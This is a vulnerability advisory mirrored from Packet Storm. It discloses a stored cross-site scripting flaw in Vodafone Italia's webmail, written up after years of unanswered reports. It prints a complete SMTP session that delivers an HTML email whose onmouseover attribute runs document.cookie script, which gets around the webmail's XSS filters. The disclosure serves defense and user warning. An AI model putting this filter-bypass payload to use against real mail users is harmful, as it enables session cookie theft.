Lucene search
+L

Vodafone Italia Webmail Cross Site Scripting

🗓️ 13 Jul 2017 00:00:00Reported by theMiddleType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 37 Views

Vodafone Italia Webmail Cross Site Scripting vulnerability disclose

Code
`# Title: Vodafone Webmail - Stored Cross-Site Scripting  
# Date: 2017-07-14  
# Exploit Author: theMiddle / https://github.com/theMiddleBlue  
# Website: https://web.mail.vodafone.it  
  
  
1. Description  
the Vodafone Italia webmail (web.mail.vodafone.it) suffers from a   
stored cross-site scripting vulnerability. The XSS-Filters can be eluded,  
and the vulnerability can be exploited, by sending an e-mail message with  
a specific format that will be shown below.  
  
After years of no-answer from Vodafone, I decided to disclose it in order  
to alert users and companies that use this webmail.  
  
  
2. Exploit vulnerability  
-------------------------------------------  
# telnet mx.vodafone.arubamail.it 25  
Trying 62.149.178.10...  
Connected to mx.vodafone.arubamail.it.  
Escape character is '^]'.  
220 mxcmd02.vf.aruba.it bizsmtp ESMTP server ready  
HELO example.com  
250 mxcmd02.vf.aruba.it hello [*****], pleased to meet you  
MAIL FROM: [email protected]  
250 2.1.0 <[email protected]> sender ok  
RCPT TO: *****@vodafone.it  
250 2.1.5 <*****@vodafone.it> recipient ok  
DATA  
354 enter mail, end with "." on a line by itself  
Subject: test xss  
From: theMiddle <[email protected]>  
To: *****@vodafone.it  
Content-Type: text/html; charset=utf-8  
  
<div onmouseover  
="alert(document.cookie);"  
style  
="height:600px;">  
test  
</div>  
  
.  
250 2.0.0 kJLA1v0060an1Af01JLXCz mail accepted for delivery  
QUIT  
221 2.0.0 mxcmd02.vf.aruba.it bizsmtp closing connection  
Connection closed by foreign host.  
--------------------------------------------  
  
A screenshot of the executed javascript on Chrome Browser:  
http://i.imgur.com/Ap4NK9c.png  
  
  
3. Timeline  
2014-10-31: Initial report to abuse Vodafone e-mail address (no answer received).  
2015-06-25: Second contact via social network (no answer received).  
2017-07-13: Third e-mail to [email protected] (no answer received).  
2017-07-14: Disclosure.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation